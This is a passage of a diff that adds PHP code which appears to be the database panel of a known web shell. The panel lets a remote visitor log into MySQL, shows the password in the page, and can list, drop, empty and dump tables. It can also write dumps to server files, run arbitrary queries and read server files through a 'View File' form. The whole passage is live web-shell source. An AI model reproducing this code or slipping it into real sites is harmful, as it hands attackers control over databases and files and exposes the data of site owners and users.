+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+
+  echo "</center>";
+
+ }
+
+ echo "</td></tr><tr>";
+
+ if (!$sql_sock) {?>
+ <td width="28%" height="100" valign="top"><center><font size="5"> i </font></center>
+  <li>If login is null, login is owner of process.<li>
+  If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table>
+  </td>
+  <?php }
+
+ else
+{
+
+  //Start left panel
+
+  if (!empty($sql_db))
+  {
+
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+
+   $result = mysql_list_tables($sql_db);
+
+   if (!$result) {echo mysql_smarterror();}
+
+   else
+
+   {
+
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+
+    $c = 0;
+
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+
+    if (!$c) {echo "No tables found in database.";}
+
+   }
+
+  }
+
+  else
+
+  {
+
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+
+   $result = mysql_list_dbs($sql_sock);
+
+   if (!$result) {echo mysql_smarterror();}
+
+   else
+
+   {
+
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+
+    $c = 0;
+
+    $dbs = "";
+
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+
+    echo "<option value=\"\">Databases (".$c.")</option>";
+
+    echo $dbs;
+
+   }
+
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+
+  }
+
+  //End left panel
+
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+
+  //Start center panel
+
+  $diplay = TRUE;
+
+  if ($sql_db)
+
+  {
+
+   if (!is_numeric($c)) {$c = 0;}
+
+   if ($c == 0) {$c = "no";}
+
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+
+   echo "</b></center>";
+
+   $acts = array("","dump");
+
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+
+   elseif ($sql_tbl_act == "insert")
+
+   {
+
+    if ($sql_tbl_insert_radio == 1)
+
+    {
+
+     $keys = "";
+
+     $akeys = array_keys($sql_tbl_insert);
+
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+
+     $values = "";
+
+     $i = 0;
+
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+
+     $sql_act = "query";
+
+     $sql_tbl_act = "browse";
+
+    }
+
+    elseif ($sql_tbl_insert_radio == 2)
+
+    {
+
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+
+     $sql_act = "query";
+
+     $sql_tbl_act = "browse";
+
+    }
+
+   }
+
+   if ($sql_act == "query")
+
+   {
+
+    echo "<hr size=\"1\" noshade>";
+
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+
+   }
+
+   if (in_array($sql_act,$acts))
+
+   {
+
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+
+    if ($sql_act == "newtbl")
+
+    {
+
+     echo "<b>";
+
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+
+    }
+
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+
+   }
+
+   elseif ($sql_act == "dump")
+
+   {
+
+    if (empty($submit))
+
+    {
+
+     $diplay = FALSE;
+
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+
+     $v = join (";",$dmptbls);
+
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+
+     if ($dump_file) {$tmp = $dump_file;}
+
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+
+     echo "</form>";
+
+    }
+
+    else
+
+    {
+
+     $diplay = TRUE;
+
+     $set = array();
+
+     $set["sock"] = $sql_sock;
+
+     $set["db"] = $sql_db;
+
+     $dump_out = "download";
+
+     $set["print"] = 0;
+
+     $set["nl2br"] = 0;
+
+     $set[""] = 0;
+
+     $set["file"] = $dump_file;
+
+     $set["add_drop"] = TRUE;
+
+     $set["onlytabs"] = array();
+
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+
+     $ret = mysql_dump($set);
+
+     if ($sql_dump_download)
+
+     {
+
+      @ob_clean();
+
+      header("Content-type: application/octet-stream");
+
+      header("Content-length: ".strlen($ret));
+
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+
+      echo $ret;
+
+      exit;
+
+     }
+
+     elseif ($sql_dump_savetofile)
+
+     {
+
+      $fp = fopen($sql_dump_file,"w");
+
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+
+      else
+
+      {
+
+       fwrite($fp,$ret);
+
+       fclose($fp);
+
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+
+      }
+
+     }
+
+     else {echo "<b>Dump: nothing to do!</b>";}
+
+    }
+
+   }
+
+   if ($diplay)
+
+   {
+
+    if (!empty($sql_tbl))
+
+    {
+
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+
+     $count_row = mysql_fetch_array($count);
+
+     mysql_free_result($count);
+
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+
+     $tbl_struct_fields = array();
+
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+
+     if (!is_numeric($perpage)) {$perpage = 10;}
+
+     $numpages = $count_row[0]/$perpage;
+
+     $e = explode(" ",$sql_order);
+
+     if (count($e) == 2)
+
+     {
+
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+
+      else {$asc_desc = "ASC";}
+
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+
+     }
+
+     else {$v = "";}
+
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+
+     $result = mysql_query($query) or print(mysql_smarterror());
+
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+
+     if ($sql_tbl_act == "insert")
+
+     {
+
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+
+      if (!empty($sql_tbl_insert_radio))
+
+      {
+
+
+
+      }
+
+      else
+
+      {
+
+       echo "<br><br><b>Inserting row into table:</b><br>";
+
+       if (!empty($sql_tbl_insert_q))
+
+       {
+
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+
+        $sql_query .= " LIMIT 1;";
+
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+
+        $values = mysql_fetch_assoc($result);
+
+        mysql_free_result($result);
+
+       }
+
+       else {$values = array();}
+
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+
+       foreach ($tbl_struct_fields as $field)
+
+       {
+
+        $name = $field["Field"];
+
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+
+        $i++;
+
+       }
+
+       echo "</table><br>";
+
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+
+      }
+
+     }
+
+     if ($sql_tbl_act == "browse")
+
+     {
+
+      $sql_tbl_ls = abs($sql_tbl_ls);
+
+      $sql_tbl_le = abs($sql_tbl_le);
+
+      echo "<hr size=\"1\" noshade>";
+
+      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
+
+      $b = 0;
+
+      for($i=0;$i<$numpages;$i++)
+
+      {
+
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+
+       echo $i;
+
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+
+       else {echo "&nbsp;";}
+
+      }
+
+      if ($i == 0) {echo "empty";}
+
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1>";
+
+      echo "<tr>";
+
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+
+      {
+
+       $v = mysql_field_name($result,$i);
+
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+
+       else {$s = "a"; $m = "desc";}
+
+       echo "<td>";
+
+       if (empty($e[0])) {$e[0] = "a";}
+
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
+
+       echo "</td>";
+
+      }
+
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+
+      echo "</tr>";
+
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+
+      {
+
+       echo "<tr>";
+
+       $w = "";
+
+       $i = 0;
+
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+
+       $i = 0;
+
+       foreach ($row as $k=>$v)
+
+       {
+
+        $v = htmlspecialchars($v);
+
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+
+        echo "<td>".$v."</td>";
+
+        $i++;
+
+       }
+
+       echo "<td>";
+
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
+
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
+
+       echo "</td>";
+
+       echo "</tr>";
+
+      }
+
+      mysql_free_result($result);
+
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+
+      echo "<option value=\"\">With selected:</option>";
+
+      echo "<option value=\"deleterow\">Delete</option>";
+
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+
+     }
+
+    }
+
+    else
+
+    {
+
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+
+     if (!$result) {echo mysql_smarterror();}
+
+     else
+
+     {
+
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+
+      
+
+      $i = 0;
+
+      $tsize = $trows = 0;
+
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+
+      {
+
+       $tsize += $row["Data_length"];
+
+       $trows += $row["Rows"];
+
+       $size = view_size($row["Data_length"]);
+
+       echo "<tr>";
+
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+
+       echo "<td>".$row["Rows"]."</td>";
+
+       echo "<td>".$row["Type"]."</td>";
+
+       echo "<td>".$row["Create_time"]."</td>";
+
+       echo "<td>".$row["Update_time"]."</td>";
+
+       echo "<td>".$size."</td>";
+
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
+
+       echo "</tr>";
+
+       $i++;
+
+      }
+
+      echo "<tr bgcolor=\"000000\">";
+
+      echo "<td><center><b>»</b></center></td>";
+
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+
+      echo "<td><b>".$trows."</b></td>";
+
+      echo "<td>".$row[1]."</td>";
+
+      echo "<td>".$row[10]."</td>";
+
+      echo "<td>".$row[11]."</td>";
+
+      echo "<td><b>".view_size($tsize)."</b></td>";
+
+      echo "<td></td>";
+
+      echo "</tr>";
+
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+
+      echo "<option value=\"\">With selected:</option>";
+
+      echo "<option value=\"tbldrop\">Drop</option>";
+
+      echo "<option value=\"tblempty\">Empty</option>";
+
+      echo "<option value=\"tbldump\">Dump</option>";
+
+      echo "<option value=\"tblcheck\">Check table</option>";
+
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+
+      echo "<option value=\"tblrepair\">Repair table</option>";
+
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+
+      mysql_free_result($result);
+
+     }
+
+    }
+
+   }
+
+   }
+
+  }
+
+  else
+
+  {
+
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+
+   if (!empty($sql_act))
+
+   {
+
+    echo "<hr size=\"1\" noshade>";
+
+    if ($sql_act == "newdb")
+
+    {
+
+     echo "<b>";
+
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+
